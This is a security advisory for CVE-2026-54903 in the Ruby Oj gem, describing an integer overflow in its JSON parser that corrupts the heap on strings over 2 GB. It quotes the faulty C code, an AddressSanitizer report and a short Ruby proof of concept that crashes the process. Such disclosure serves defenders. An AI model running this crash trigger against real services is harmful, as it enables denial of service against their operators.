PT-2026-51089 · Rubygems · Oj
Published
2026-06-19
·
Updated
2026-06-19
·
CVE-2026-54903
CVSS v4.0
8.7
High
| Vector | AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N |
Summary
Oj.load is vulnerable to heap corruption when parsing a JSON string longer than 2 GB. An integer overflow in buf append string (buf.h:61) converts the string length to a large negative size t, causing memcpy to copy an astronomically large amount of data out of bounds. This crashes the process and can corrupt adjacent heap memory.Version
- Software: oj gem
- Affected: all versions with
ext/oj/buf.handext/oj/parse.c - Latest tested: 3.17.1 (confirmed present)
Details
ext/oj/buf.h, line 61:c
inline static void buf append string(Buf buf, const char *s, size t slen) {
// ...
memcpy(buf->tail, s, slen); // slen derived from 32-bit int that wrapped negativeIn
parse.c, escape sequence handling computes the remaining string length as an int:c
// parse.c:402 (read escaped str)
int slen = (int)(s - str); // ← wraps to negative when string > 2 GB
buf append string(buf, str, (size t)slen); // ← (size t)(-2147483648) = 0x80000000...ASAN report:
==399019==ERROR: AddressSanitizer: negative-size-param: (size=-2147483648)
#0 asan memcpy
#1 buf append string /ext/oj/buf.h:61
#2 read escaped str /ext/oj/parse.c:402
#3 read str /ext/oj/parse.c:542
#4 oj parse2 /ext/oj/parse.c:882
#5 oj pi parse /ext/oj/parse.c:1256
#6 oj object parse /ext/oj/object.c:701
#7 load /ext/oj/oj.c:1259
0x7f5a26ff0801 is located 1 bytes inside of 2147483657-byte region [0x7f5a26ff0800, 0x7f5aa6ff0809)Reproduce
ruby
require 'oj'
n = 1 << 31 # 2 GB
json = '"' + ('A' * n) + 'A"' # >2GB JSON string with a trailing escape
Oj.load(json)Fix
Integer Overflow
Found an issue in the description? Have something to add? Feel free to write us 👾
Weakness Enumeration
Related Identifiers
Affected Products
Oj